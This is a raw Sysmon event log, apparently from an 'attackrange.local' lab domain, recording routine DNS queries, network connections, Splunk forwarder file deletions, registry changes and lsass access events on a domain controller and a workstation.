09:20:40.206{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-429.attackrange.local53domainfalse10.0.1.14win-dc-429.attackrange.local61538- 354300x80000000000000001054583Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.206{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMudptruetruea00:10e:0:0:f8c0:7e28:8c9e:ffff-61538-truea00:10e:0:0:0:0:0:0win-dc-429.attackrange.local53domain 354300x80000000000000001054582Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.203{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local49354- 354300x80000000000000001054581Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.201{5EBD8912-8CA0-6151-0100-00000000FD01}4SystemNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-429.attackrange.local49712-false10.0.1.14win-dc-429.attackrange.local445microsoft-ds 354300x80000000000000001054580Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.201{5EBD8912-8CA0-6151-0100-00000000FD01}4SystemNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local49712-false10.0.1.14win-dc-429.attackrange.local445microsoft-ds 354300x80000000000000001054579Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.199{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-429.attackrange.local53domainfalse10.0.1.14win-dc-429.attackrange.local64061- 354300x80000000000000001054578Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.199{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMudptruefalse10.0.1.14win-dc-429.attackrange.local64061-false10.0.1.14win-dc-429.attackrange.local53domain 354300x80000000000000001054577Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.193{5EBD8912-8CC0-6151-1400-00000000FD01}1040C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudpfalsefalse127.0.0.1-61540-false127.0.0.1-53domain 354300x80000000000000001054576Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.185{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse10.0.1.14win-dc-429.attackrange.local57641-false10.0.0.2ip-10-0-0-2.eu-central-1.compute.internal53domain 354300x80000000000000001054575Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.164{5EBD8912-8CDC-6151-6E00-00000000FD01}2608C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local49711-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 22542200x80000000000000001054574Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.260{5EBD8912-8CBD-6151-0B00-00000000FD01}640_ldap._tcp.gc._msdcs.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000001054573Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.255{5EBD8912-8CBD-6151-0B00-00000000FD01}640_ldap._tcp.Default-First-Site-Name._sites.dc._msdcs.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000001054572Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.252{5EBD8912-8CC0-6151-1600-00000000FD01}1296win-dc-429.attackrange.local0fe80::65e5:9cae:dd2b:361b;::ffff:10.0.1.14;C:\Windows\System32\svchost.exe 22542200x80000000000000001054571Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.252{5EBD8912-8CBD-6151-0B00-00000000FD01}640_ldap._tcp.dc._msdcs.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000001054570Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.249{5EBD8912-8CBD-6151-0B00-00000000FD01}640win-dc-429.attackrange.local0fe80::65e5:9cae:dd2b:361b;::ffff:10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000001054569Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.247{5EBD8912-8CBD-6151-0B00-00000000FD01}64044a19d5f-c868-4426-8454-ab57d4792301._msdcs.attackrange.local.0type: 5 win-dc-429.attackrange.local;C:\Windows\System32\lsass.exe 22542200x80000000000000001054568Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.244{5EBD8912-8CBD-6151-0B00-00000000FD01}640_ldap._tcp.c17d17ff-578b-48b1-9023-6db0a438f5aa.domains._msdcs.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000001054567Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.241{5EBD8912-8CBD-6151-0B00-00000000FD01}640_msdcs.attackrange.local.0type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000001054566Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.241{5EBD8912-8CBD-6151-0B00-00000000FD01}640_msdcs.attackrange.local.0type: 2 win-dc-429.attackrange.local;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000001054565Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.240{5EBD8912-8CC0-6151-1100-00000000FD01}412win-dc-429.attackrange.local0fe80::65e5:9cae:dd2b:361b;::ffff:10.0.1.14;C:\Windows\System32\svchost.exe 22542200x80000000000000001054564Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.239{5EBD8912-8CBD-6151-0B00-00000000FD01}640_ldap._tcp.pdc._msdcs.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000001054563Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.230{5EBD8912-8CBD-6151-0B00-00000000FD01}640_ldap._tcp.Default-First-Site-Name._sites.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000001054562Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.226{5EBD8912-8CD0-6151-2D00-00000000FD01}2452win-dc-429.attackrange.local0fe80::65e5:9cae:dd2b:361b;::ffff:10.0.1.14;C:\Windows\System32\dfssvc.exe 22542200x80000000000000001054561Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.225{5EBD8912-8CBD-6151-0B00-00000000FD01}640_ldap._tcp.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000001054560Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.217{5EBD8912-8CBD-6151-0B00-00000000FD01}640attackrange.local.0type: 2 win-dc-429.attackrange.local;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000001054559Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.210{5EBD8912-8CC0-6151-1400-00000000FD01}1040win10.ipv6.microsoft.com.0type: 5 onpremwindows.ipv6.microsoft.com.akadns.net;type: 5 trdovmssukwest.ipv6.microsoft.com.akadns.net;40.81.120.44;C:\Windows\System32\svchost.exe 22542200x80000000000000001054558Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.210{5EBD8912-8CBD-6151-0B00-00000000FD01}640attackrange.local.0type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000001054557Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.210{5EBD8912-8CC0-6151-1100-00000000FD01}412attackrange.local0::ffff:10.0.1.14;C:\Windows\System32\svchost.exe 22542200x80000000000000001054556Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.208{5EBD8912-8CC0-6151-1400-00000000FD01}1040eu-central-1.compute.internal9501-C:\Windows\System32\svchost.exe 22542200x80000000000000001054555Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.205{5EBD8912-8CC0-6151-1400-00000000FD01}1040_ldap._tcp.Default-First-Site-Name._sites.gc._msdcs.attackrange.local.9502-C:\Windows\System32\svchost.exe 22542200x80000000000000001054554Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:39.696{5EBD8912-8CD0-6151-2A00-00000000FD01}2404win-dc-429.attackrange.local0fe80::65e5:9cae:dd2b:361b;::ffff:10.0.1.14;C:\Windows\System32\dns.exe 22542200x80000000000000001054553Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:39.694{5EBD8912-8CBD-6151-0B00-00000000FD01}640WIN-DC-4290fe80::65e5:9cae:dd2b:361b;::ffff:10.0.1.14;C:\Windows\System32\lsass.exe 354300x8000000000000000980662Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:38.834{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59501-false10.0.1.12-8000- 23542300x8000000000000000980661Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:41.024{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5F4545E0F14EE53AE6F6AA9A0CA8ABF1,SHA256=87FC4AFA205E38BE5283C3CF4E1689AED1A995FDE5CCAC0029E8A185DA2453EB,IMPHASH=00000000000000000000000000000000falsetrue 22542200x80000000000000001054704Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.315{5EBD8912-8CBD-6151-0B00-00000000FD01}640ForestDnsZones.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000001054703Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.312{5EBD8912-8CBD-6151-0B00-00000000FD01}640_ldap._tcp.Default-First-Site-Name._sites.DomainDnsZones.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000001054702Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.308{5EBD8912-8CBD-6151-0B00-00000000FD01}640_ldap._tcp.DomainDnsZones.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000001054701Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.304{5EBD8912-8CBD-6151-0B00-00000000FD01}640DomainDnsZones.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000001054700Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.300{5EBD8912-8CBD-6151-0B00-00000000FD01}640_kpasswd._udp.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000001054699Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.296{5EBD8912-8CBD-6151-0B00-00000000FD01}640_kpasswd._tcp.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000001054698Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.293{5EBD8912-8CBD-6151-0B00-00000000FD01}640_kerberos._udp.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000001054697Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.289{5EBD8912-8CBD-6151-0B00-00000000FD01}640_gc._tcp.Default-First-Site-Name._sites.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000001054696Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.284{5EBD8912-8CBD-6151-0B00-00000000FD01}640_gc._tcp.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000001054695Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.281{5EBD8912-8CBD-6151-0B00-00000000FD01}640_kerberos._tcp.Default-First-Site-Name._sites.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000001054694Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.276{5EBD8912-8CBD-6151-0B00-00000000FD01}640_kerberos._tcp.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000001054693Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.272{5EBD8912-8CBD-6151-0B00-00000000FD01}640_kerberos._tcp.Default-First-Site-Name._sites.dc._msdcs.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000001054692Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.270{5EBD8912-8CBD-6151-0B00-00000000FD01}640_kerberos._tcp.dc._msdcs.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000001054691Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.265{5EBD8912-8CBD-6151-0B00-00000000FD01}640gc._msdcs.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000001054690Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.263{5EBD8912-8CBD-6151-0B00-00000000FD01}640_ldap._tcp.Default-First-Site-Name._sites.gc._msdcs.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 23542300x8000000000000000980663Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:42.243{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9EE2A24865763F4E53CE0DA81C991364,SHA256=2345FAC9F640EED2C54A30AF3580173566F80BDA0190B9D91FE4C9718D53A171,IMPHASH=00000000000000000000000000000000falsetrue 22542200x80000000000000001054706Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.323{5EBD8912-8CBD-6151-0B00-00000000FD01}640_ldap._tcp.Default-First-Site-Name._sites.ForestDnsZones.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000001054705Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.318{5EBD8912-8CBD-6151-0B00-00000000FD01}640_ldap._tcp.ForestDnsZones.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 23542300x8000000000000000980664Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:43.477{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=64793C738A5F3BA68EBA89AF3747F6DC,SHA256=05988C29EAB4B8E53BD2EBC0A343BAD503C688B51ADBA5B6C6AAFCF23EA1681B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980665Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:44.711{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6924C7A95F713E98C6109AF829CBA1A1,SHA256=0A8B18AF288120D048C57789ADFD263A39DE2B092691A31B6B3F23D93AF22345,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980668Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:45.977{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1345388E53D1F01DF31F6D1115C76F6A,SHA256=695699304EF307D49002DFFC44317F265DAB90A5F21EC3B573EA4DC30D923AB4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980667Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:45.977{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=83F4F4ABEE7E851B27C3E9DE55ECD21B,SHA256=388AC5B5406DDF17FD2E6415515EE76A625AE85FEBE000573C38B833758609AF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980666Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:45.945{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3E2AE72E44B0F0E952500E355E003962,SHA256=62AA511AA972A0D8A24BF9B1370414B001D98AFB9572F2BF4D8E92437E771CED,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001054707Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:44.037{5EBD8912-8CC0-6151-0F00-00000000FD01}300C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-55857-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x8000000000000000980670Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:46.992{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B1AFFBC8C4D834801617B54186B5541C,SHA256=078230A800D1F56291815E749067C3FE33953B6E7A0A49B7252C6FAFA6C925F5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054711Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:46.855{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AF40CCBDF88DF87EC1DB6A6C2F45BF8B,SHA256=33C36A16A6B002AE85C0983466BE2DCCAD23582E0230D3FC1C2075252ABD3CE2,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000980669Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:43.325{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-59755-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x80000000000000001054710Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:46.527{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5CFEC9981ABD6FB79D79BBFB0D066824,SHA256=2E6CDDA4D5C92C296B2F00A45DE8DBC2521A0F64B473E772493857BB28435989,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054709Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:46.527{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3378BB6EDA7490FBC9E8B0E789773AA6,SHA256=6FE88C4D130CE44119647F44FEAF579E6ECB9C419AADBF3954345C18E5834E38,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054708Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:46.152{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C750D55CC5C176C5ADA9F27B961BACE9,SHA256=3E2496640E0B52D3A2FECAB98EBFD6397113DC3DCA31F245AFA87168A906060F,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001054713Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:46.383{5EBD8912-8CC0-6151-0F00-00000000FD01}300C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse162.55.235.26static.26.235.55.162.clients.your-server.de50105-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 354300x80000000000000001054712Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:46.094{5EBD8912-8CDC-6151-6E00-00000000FD01}2608C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local49720-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000980671Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:48.008{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=34BA811A6EEB2887B77F903AF585E542,SHA256=050B4C29F638545F68BA74DCA84AFDC609B9D5831FD22A21F2AF97C7D775951F,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000001054721Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:20:48.933{5EBD8912-8CC0-6151-1100-00000000FD01}412C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip6\Parameters\Interfaces\{b4aceb91-3521-4f28-a5f8-434384469e9a}\Dhcpv6StateDWORD (0x00000001) 13241300x80000000000000001054720Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:20:48.933{5EBD8912-8CC0-6151-1100-00000000FD01}412C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip6\Parameters\Interfaces\{b4aceb91-3521-4f28-a5f8-434384469e9a}\Dhcpv6StateDWORD (0x00000000) 10341000x80000000000000001054719Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:48.933{5EBD8912-8CBD-6151-0B00-00000000FD01}640672C:\Windows\system32\lsass.exe{5EBD8912-8CC0-6151-1400-00000000FD01}1040C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24be7|C:\Windows\system32\lsasrv.dll+25d2d|C:\Windows\system32\lsasrv.dll+24a65|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054718Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:48.933{5EBD8912-8CBD-6151-0B00-00000000FD01}640672C:\Windows\system32\lsass.exe{5EBD8912-8CC0-6151-1400-00000000FD01}1040C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 13241300x80000000000000001054717Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:20:48.870{5EBD8912-8CA0-6151-0100-00000000FD01}4SystemHKLM\System\CurrentControlSet\Services\tunnel\Enum\NextInstanceDWORD (0x00000002) 13241300x80000000000000001054716Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:20:48.870{5EBD8912-8CA0-6151-0100-00000000FD01}4SystemHKLM\System\CurrentControlSet\Services\tunnel\Enum\CountDWORD (0x00000002) 13241300x80000000000000001054715Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:20:48.870{5EBD8912-8CA0-6151-0100-00000000FD01}4SystemHKLM\System\CurrentControlSet\Services\tunnel\Enum\1SWD\IP_TUNNEL_VBUS\Teredo_Tunnel_Device 23542300x80000000000000001054714Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:47.995{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1B338F8385047A55C3F65AA976681AFF,SHA256=33D6844613D1E9CE56576B709A7BCC0542B3B424E0A14C9C09EBFDD4C5D8AF15,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000980673Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:44.864{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT 